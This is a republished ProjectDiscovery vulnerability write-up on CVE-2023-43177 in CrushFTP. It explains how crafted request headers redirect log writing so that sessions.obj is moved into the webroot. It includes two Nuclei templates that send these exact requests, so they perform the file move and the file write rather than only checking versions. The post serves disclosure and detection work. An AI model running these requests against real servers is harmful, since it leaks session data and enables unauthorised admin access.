CrushFTP - CVE-2023-43177 Unauthenticated Remote Code Execution
2023-12-9 21:52:0 Author: blog.projectdiscovery.io(查看原文) 阅读量:9 收藏

CVE-2023-43177 is a critical vulnerability in CrushFTP. The vulnerability could potentially allow unauthenticated attackers with network access to the CrushFTP Instance to write files in the local file system and eventually in some versions could allow the executing of arbitrary system commands.

Technical Details

Based on the information shared in the original blog post at https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/, we embarked on an effort to gain a deeper understanding of the vulnerability. In the CrushFTP application, a default behaviour exists where it issues an anonymous authenticated session cookie when a request is made. Consequently, this results in a blurred distinction between an authenticated user and an unauthenticated user.

The application's logic functions in the following manner: when the request includes the as2-to header, the keys within the user_info session object are sourced from user input, specifically from the request headers. Subsequently, at the conclusion of request processing, a function call to drain_log() is executed, which logs the request's details, including specific request headers, in the log files, along with other pertinent information.

Interestingly, the locations where the log entries are written are determined by specific keys within the "user_info" session object. Because these keys can be supplied via the request header, owing to the existence of the "as2-to" header, it becomes possible for an attacker to potentially gain control over the location or even the log file itself.

These are the headers responsible for altering the logic of logs writing:

  • user_log_path - The directory from where the file needs to be moved (moved because the file will be deleted if successfully moved).
  • user_log_file - The filename that gets moved.
  • user_log_path_custom - The new location where logs should be written.
  • dont_log - If not set to "true", doesn't log (append) anything in the file.

In other words, this means that we have the capability to copy any file from the filesystem to the webroot; however, it's important to note that the file will be removed from its original location. Within the application directory, there exists a vital file named "sessions.obj" which houses essential details about currently active sessions. Interestingly, this file is automatically recreated if it is deleted. Therefore, it represents the perfect target for exploiting this vulnerability, as gaining access to "sessions.obj" would potentially grant an attacker admin privileges to the CrushFTP instance.

Nuclei template to detect CVE-2023-43177 on CrushFTP 10.5

id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.00106
    epss-percentile: 0.42673
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce

flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(8)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{randstr}}
      user_log_path: "./"
      user_log_path_custom: "./WebInterface/{{dirname}}/"
      user_log_file: sessions.obj
      dont_log: true
      Content-Type: application/x-www-form-urlencoded
    body: |
      post=body

  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/sessions.obj"

    max-size: 5000
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(header, 'application/binary')
          - contains_any(to_lower(header), 'webinterface', 'crushftp')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - content_length

However, we observed that in our specific version, this exploit didn't perform as anticipated. Following the usual process of decompiling and debugging, we uncovered a crucial distinction. In versions before approximately 10.4, the logic did not incorporate "user_log_path_custom" in the log-writing workflow. Instead, the mechanism in place involves the creation of a specified directory or file and logging the request into it, rather than simply copying a file. Consequently, while this approach provides a file write primitive anywhere in the system, it doesn't afford complete control over the content. As a result, it appears that exploiting it for remote code execution may not be feasible, or at least, not based on our current understanding.

Nuclei template to detect CVE-2023-43177 on <= CrushFTP 10.4

id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.00106
    epss-percentile: 0.42673
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce

flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"

    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{{filename}}"
      Content-Type: application/x-www-form-urlencoded

    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and

By embracing Nuclei and participating in the open-source community or joining the ProjectDiscovery Cloud Platform, organizations can strengthen their security defenses, stay ahead of emerging threats, and create a safer digital environment. Security is a collective effort, and together we can continuously evolve and tackle the challenges posed by cyber threats.

- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research


文章来源: https://blog.projectdiscovery.io/crushftp-rce/
如有侵权请联系:admin#unsafe.sh